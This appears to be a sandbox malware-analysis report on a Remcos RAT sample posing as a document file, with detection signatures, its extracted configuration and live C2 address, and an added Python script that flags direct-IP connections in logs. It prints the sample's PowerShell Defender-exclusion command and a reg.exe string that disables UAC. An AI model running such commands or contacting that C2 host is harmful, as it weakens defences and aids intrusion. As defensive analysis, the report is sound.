Windows Analysis Report
Material requirements_1.pif.exe

Overview

General Information

Sample name: Material requirements_1.pif.exe
Analysis ID: 1586623
MD5: b10dbc0225aac52e8ee344602847a3cc
SHA1: 4bedc08167e1f21c85593c730e29d10036e0b219
SHA256: 7a12e9a93cb32e622b05613c160fbbfae2d379f5c255bfca02eb1b54fe1a78a8
Tags: exe, user-TeamDreier

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Injects a PE file into foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate processes and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Stores large binary data to the registry
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • Material requirements_1.pif.exe (PID: 6648 cmdline: "C:\Users\user\Desktop\Material requirements_1.pif.exe" MD5: B10DBC0225AAC52E8EE344602847A3CC)
    • powershell.exe (PID: 2076 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Material requirements_1.pif.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIADAP.exe (PID: 4956 cmdline: wmiadap.exe /F /T /R MD5: 1BFFABBD200C850E6346820E92B915DC)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
Malware configuration (Remcos): {"Host:Port:Password": ["87.120.116.245:2404:1"], "Assigned name": "Remco", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-0PJCBG", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Yara matches (memory dumps):
Source: 00000007.00000002.4529165570.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp; Rule: JoeSecurity_Remcos; Description: Yara detected Remcos RAT; Author: Joe Security
Source: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp; Rule: JoeSecurity_Keylogger_Generic; Description: Yara detected Keylogger Generic; Author: Joe Security
Source: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp; Rule: JoeSecurity_Remcos; Description: Yara detected Remcos RAT; Author: Joe Security
Source: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp; Rule: JoeSecurity_UACBypassusingCMSTP; Description: Yara detected UAC Bypass using CMSTP; Author: Joe Security
Source: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp; Rule: Windows_Trojan_Remcos_b296e965; Description: unknown; Author: unknown
  • 0x6b6f8:$a1: Remcos restarted by watchdog!
  • 0x6bc70:$a3: %02i:%02i:%02i:%03i
Yara matches (unpacked PE files):
Source: 0.2.Material requirements_1.pif.exe.4bd1360.1.unpack; Rule: JoeSecurity_Keylogger_Generic; Description: Yara detected Keylogger Generic; Author: Joe Security
Source: 0.2.Material requirements_1.pif.exe.4bd1360.1.unpack; Rule: JoeSecurity_Remcos; Description: Yara detected Remcos RAT; Author: Joe Security
Source: 0.2.Material requirements_1.pif.exe.4bd1360.1.unpack; Rule: JoeSecurity_UACBypassusingCMSTP; Description: Yara detected UAC Bypass using CMSTP; Author: Joe Security
Source: 0.2.Material requirements_1.pif.exe.4bd1360.1.unpack; Rule: Windows_Trojan_Remcos_b296e965; Description: unknown; Author: unknown
  • 0x69ef8:$a1: Remcos restarted by watchdog!
  • 0x6a470:$a3: %02i:%02i:%02i:%03i
Source: 0.2.Material requirements_1.pif.exe.4bd1360.1.unpack; Rule: REMCOS_RAT_variants; Description: unknown; Author: unknown
  • 0x64194:$str_a1: C:\Windows\System32\cmd.exe
  • 0x64110:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64110:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x64c10:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x64204:$str_b2: Executing file:
  • 0x6503c:$str_b3: GetDirectListeningPort
  • 0x64a00:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x64b80:$str_b7: \update.vbs
  • 0x6422c:$str_b9: Downloaded file:
  • 0x64218:$str_b10: Downloading file:
  • 0x642bc:$str_b12: Failed to upload file:
  • 0x65004:$str_b13: StartForward
  • 0x65024:$str_b14: StopForward
  • 0x64ad8:$str_b15: fso.DeleteFile "
  • 0x64a6c:$str_b16: On Error Resume Next
  • 0x64b08:$str_b17: fso.DeleteFolder "
  • 0x642ac:$str_b18: Uploaded file:
  • 0x6426c:$str_b19: Unable to delete:
  • 0x64aa0:$str_b20: while fso.FileExists("
  • 0x64749:$str_c0: [Firefox StoredLogins not found]

System Summary

Source: Process started. Author: Florian Roth (Nextron Systems). Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Material requirements_1.pif.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Material requirements_1.pif.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Material requirements_1.pif.exe", ParentImage: C:\Users\user\Desktop\Material requirements_1.pif.exe, ParentProcessId: 6648, ParentProcessName: Material requirements_1.pif.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Material requirements_1.pif.exe", ProcessId: 2076, ProcessName: powershell.exe
Source: Process started. Author: Florian Roth (Nextron Systems). Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Material requirements_1.pif.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Material requirements_1.pif.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Material requirements_1.pif.exe", ParentImage: C:\Users\user\Desktop\Material requirements_1.pif.exe, ParentProcessId: 6648, ParentProcessName: Material requirements_1.pif.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Material requirements_1.pif.exe", ProcessId: 2076, ProcessName: powershell.exe
Source: Process started. Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements). Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Material requirements_1.pif.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Material requirements_1.pif.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Material requirements_1.pif.exe", ParentImage: C:\Users\user\Desktop\Material requirements_1.pif.exe, ParentProcessId: 6648, ParentProcessName: Material requirements_1.pif.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Material requirements_1.pif.exe", ProcessId: 2076, ProcessName: powershell.exe

Stealing of Sensitive Information

Source: Registry Key set. Author: Joe Security. Data: Details: 82 36 53 45 84 97 01 4B 05 C0 27 4C E5 B8 67 C7 3E C8 93 95 2E AD 20 D5 27 03 5B A8 AD 81 F6 94 32 A7 27 D1 76 22 EB 5F D8 02 23 06 EB DA 0F BD E5 D4 B4 57 C2 FA BA B1 AA 5F 48 D6 A2 62 5C 27 81 D9 BC 3E 71 F1 95 D9 E0 E7 88 3E 98 B2 16 08 E4 F9 3F A9 F9 F0 7C 47 C3 98 BB 1A 2B D9 11 E4 06 4E CA 13 54 1A 8C 52 FC A5 92 B3 C4 7E B5 D3, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Material requirements_1.pif.exe, ProcessId: 5420, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-0PJCBG\exepath

                AV Detection

Source: 00000007.00000002.4529165570.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp; Malware Configuration Extractor: Remcos {"Host:Port:Password": ["87.120.116.245:2404:1"], "Assigned name": "Remco", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-0PJCBG", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source: Material requirements_1.pif.exe; ReversingLabs: Detection: 68%
Source: Material requirements_1.pif.exe; Virustotal: Detection: 63%
Source: Yara match; File source: 0.2.Material requirements_1.pif.exe.4bd1360.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.Material requirements_1.pif.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.Material requirements_1.pif.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Material requirements_1.pif.exe.4bd1360.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000007.00000002.4529165570.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.2085360739.000000000474E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: Material requirements_1.pif.exe PID: 6648, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: Material requirements_1.pif.exe PID: 5420, type: MEMORYSTR
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.8% probability
Source: Material requirements_1.pif.exe; Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Code function: 7_2_0043294A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,7_2_0043294A
Source: Material requirements_1.pif.exe, 00000000.00000002.2085360739.000000000474E000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_e176d666-3

                Exploits

                Source: Yara match; File source: 0.2.Material requirements_1.pif.exe.4bd1360.1.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 7.2.Material requirements_1.pif.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 7.2.Material requirements_1.pif.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 0.2.Material requirements_1.pif.exe.4bd1360.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000000.00000002.2085360739.000000000474E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: Process Memory Space: Material requirements_1.pif.exe PID: 6648, type: MEMORYSTR
                Source: Yara match; File source: Process Memory Space: Material requirements_1.pif.exe PID: 5420, type: MEMORYSTR

                Privilege Escalation

                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Code function: 7_2_00406764 _wcslen,CoGetObject (CoGetObject with an elevation moniker is how the CMSTPLUA COM-based UAC bypass flagged in the signature list is invoked)
                Source: Material requirements_1.pif.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Material requirements_1.pif.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: VpNo.pdb SHA256+; source: Material requirements_1.pif.exe
                Source: Binary string: VpNo.pdb; source: Material requirements_1.pif.exe
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Code function: 7_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Code function: 7_2_0041B43F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Code function: 7_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Code function: 7_2_0044D5F9 FindFirstFileExA
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Code function: 7_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Code function: 7_2_00406AC2 FindFirstFileW,FindNextFileW
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Code function: 7_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Code function: 7_2_00418C79 FindFirstFileW,FindNextFileW,FindNextFileW
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Code function: 7_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Code function: 7_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW

                Networking

                Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5 -> 87.120.116.245:2404
                The same signature fired on 113 TLS connections from 192.168.2.5 to 87.120.116.245:2404, one per client source port: 49709, 49711, 49713, 49714, 49715, 49717, 49736, 49754, 49772, 49787, 49806, 49823, 49838, 49853, 49866, 49882, 49898, 49911, 49925, 49945, 49960, 49975, 49992, and every port from 50004 through 50093. The JA3 fingerprint (the client's TLS ClientHello parameters) is the same on every session, which is what lets the rule attribute the traffic to the Remcos client regardless of destination.
                Source: Malware configuration extractor; IPs: 87.120.116.245
                Source: global traffic; TCP traffic: 192.168.2.5:49709 -> 87.120.116.245:2404
                Source: Joe Sandbox View; ASN Name: UNACS-AS-BG8000BurgasBG
                Source: unknown; TCP traffic detected without corresponding DNS query: 87.120.116.245 (reported 50 times, once per connection: the C2 address is carried as a literal IP in the extracted configuration and is never resolved through DNS)
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Code function: 7_2_00426107 recv
                Source: Material requirements_1.pif.exe; String found in binary or memory: http://geoplugin.net/json.gp
                Source: Material requirements_1.pif.exe, 00000000.00000002.2085360739.000000000474E000.00000004.00000800.00020000.00000000.sdmp, Material requirements_1.pif.exe, 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: http://geoplugin.net/json.gp/C
                Source: Material requirements_1.pif.exe, 00000000.00000002.2084001859.0000000002E39000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
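                The two network observations above, a signature that fires on every TLS session to one IP:port and TCP connections to that IP with no preceding DNS query, are the kind of thing a detection engineer reproduces from raw logs rather than from a sandbox. The following Python script is an added example, not Joe Sandbox or Suricata code: it correlates a connection log against DNS answers and reports public destinations that were contacted without any name having resolved to them beforehand, together with the connection count and client ports per destination. The log line formats, the sequence numbers standing in for timestamps, and the DNS answer addresses (RFC 5737 documentation ranges) are constructed for the example; only 87.120.116.245:2404 comes from the report.

```python
import ipaddress
import re

# Constructed DNS answer log: "<seq> dns <qname> A <answer-ip>".
# The answer addresses are RFC 5737 documentation ranges, not real resolutions.
DNS_LOG = """\
0001 dns geoplugin.net A 198.51.100.20
0002 dns update.example.test A 203.0.113.7
0010 dns late.example.test A 192.0.2.99
"""

# Constructed connection log: "<seq> tcp <src>:<sport> -> <dst>:<dport>".
# Only 87.120.116.245:2404 comes from the report; sequence numbers stand in
# for timestamps so that "resolved before the connection" can be checked.
CONN_LOG = """\
0003 tcp 192.168.2.5:49709 -> 87.120.116.245:2404
0004 tcp 192.168.2.5:49711 -> 87.120.116.245:2404
0005 tcp 192.168.2.5:49713 -> 198.51.100.20:80
0006 tcp 192.168.2.5:49714 -> 87.120.116.245:2404
0007 tcp 192.168.2.5:49715 -> 203.0.113.7:443
0008 tcp 192.168.2.5:49717 -> 192.168.2.1:53
0009 tcp 192.168.2.5:49736 -> 192.0.2.99:443
"""

DNS_RE = re.compile(r"^(\d+) dns (\S+) A (\S+)$")
CONN_RE = re.compile(r"^(\d+) tcp (\S+):(\d+) -> (\S+):(\d+)$")

# RFC 1918, loopback and link-local ranges are excluded explicitly rather than
# via ip_address(...).is_private, which would also exclude the RFC 5737
# documentation addresses used above as stand-ins for public hosts.
LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16")]


def is_local(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in LOCAL_NETS)


def parse_dns(text: str) -> dict:
    """Map each answered IP to the list of (seq, qname) pairs that produced it."""
    answers = {}
    for line in text.splitlines():
        m = DNS_RE.match(line.strip())
        if m:
            seq, qname, ip = m.groups()
            answers.setdefault(ip, []).append((int(seq), qname))
    return answers


def parse_conns(text: str) -> list:
    """Return (seq, src, sport, dst, dport) tuples, skipping malformed lines."""
    conns = []
    for line in text.splitlines():
        m = CONN_RE.match(line.strip())
        if m:
            seq, src, sport, dst, dport = m.groups()
            conns.append((int(seq), src, int(sport), dst, int(dport)))
    return conns


def flag_direct_ip_destinations(dns_text: str, conn_text: str) -> dict:
    """Public destinations contacted without a DNS answer naming them beforehand.

    Returns {dst_ip: {"count", "dports", "sports", "resolved_later"}}.
    Many connections to one fixed IP:port that never appeared in a DNS answer
    is the pattern the report shows for the Remcos C2.
    """
    answers = parse_dns(dns_text)
    flagged = {}
    for seq, _src, sport, dst, dport in parse_conns(conn_text):
        if is_local(dst):
            continue
        if any(a_seq <= seq for a_seq, _ in answers.get(dst, [])):
            continue  # some name resolved to this IP before the connection
        entry = flagged.setdefault(
            dst, {"count": 0, "dports": set(), "sports": [], "resolved_later": False})
        entry["count"] += 1
        entry["dports"].add(dport)
        entry["sports"].append(sport)
        entry["resolved_later"] = dst in answers  # resolved only after the fact
    for entry in flagged.values():
        entry["dports"] = sorted(entry["dports"])
        entry["sports"].sort()
    return flagged


if __name__ == "__main__":
    for dst, info in flag_direct_ip_destinations(DNS_LOG, CONN_LOG).items():
        print(f"{dst}: {info['count']} connection(s) to port(s) {info['dports']}, "
              f"client ports {info['sports']}, resolved later: {info['resolved_later']}")
```

                The ordering check matters: a destination that a name resolves to only after the first connection (192.0.2.99 in the constructed input) is still reported, with resolved_later set, since a process that already knew the address did not need DNS to find it. Run against real Zeek or Suricata EVE output the parsing regexes would be replaced by the JSON fields, but the correlation is the same.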

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Code function: 7_2_004099E4 SetWindowsHookExA 0000000D,004099D0,00000000 (hook id 0x0D is WH_KEYBOARD_LL, a low-level keyboard hook covering all processes on the desktop)
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Code function: 7_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard (both reads and writes the clipboard)
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Code function: 7_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx (translates captured virtual-key codes to characters using the foreground window's keyboard layout)
                Source: Yara match; File source: 0.2.Material requirements_1.pif.exe.4bd1360.1.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 7.2.Material requirements_1.pif.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 7.2.Material requirements_1.pif.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 0.2.Material requirements_1.pif.exe.4bd1360.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000000.00000002.2085360739.000000000474E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: Process Memory Space: Material requirements_1.pif.exe PID: 6648, type: MEMORYSTR
                Source: Yara match; File source: Process Memory Space: Material requirements_1.pif.exe PID: 5420, type: MEMORYSTR

                E-Banking Fraud

                Source: Yara match; File source: 0.2.Material requirements_1.pif.exe.4bd1360.1.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 7.2.Material requirements_1.pif.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 7.2.Material requirements_1.pif.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 0.2.Material requirements_1.pif.exe.4bd1360.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 00000007.00000002.4529165570.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000000.00000002.2085360739.000000000474E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: Process Memory Space: Material requirements_1.pif.exe PID: 6648, type: MEMORYSTR
                Source: Yara match; File source: Process Memory Space: Material requirements_1.pif.exe PID: 5420, type: MEMORYSTR

                Spam, unwanted Advertisements and Ransom Demands

                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 7_2_0041BB87 SystemParametersInfoW

                System Summary

                Source: 0.2.Material requirements_1.pif.exe.4bd1360.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.Material requirements_1.pif.exe.4bd1360.1.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 0.2.Material requirements_1.pif.exe.4bd1360.1.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 7.2.Material requirements_1.pif.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 7.2.Material requirements_1.pif.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 7.2.Material requirements_1.pif.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 7.2.Material requirements_1.pif.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 7.2.Material requirements_1.pif.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 7.2.Material requirements_1.pif.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0.2.Material requirements_1.pif.exe.4bd1360.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.Material requirements_1.pif.exe.4bd1360.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
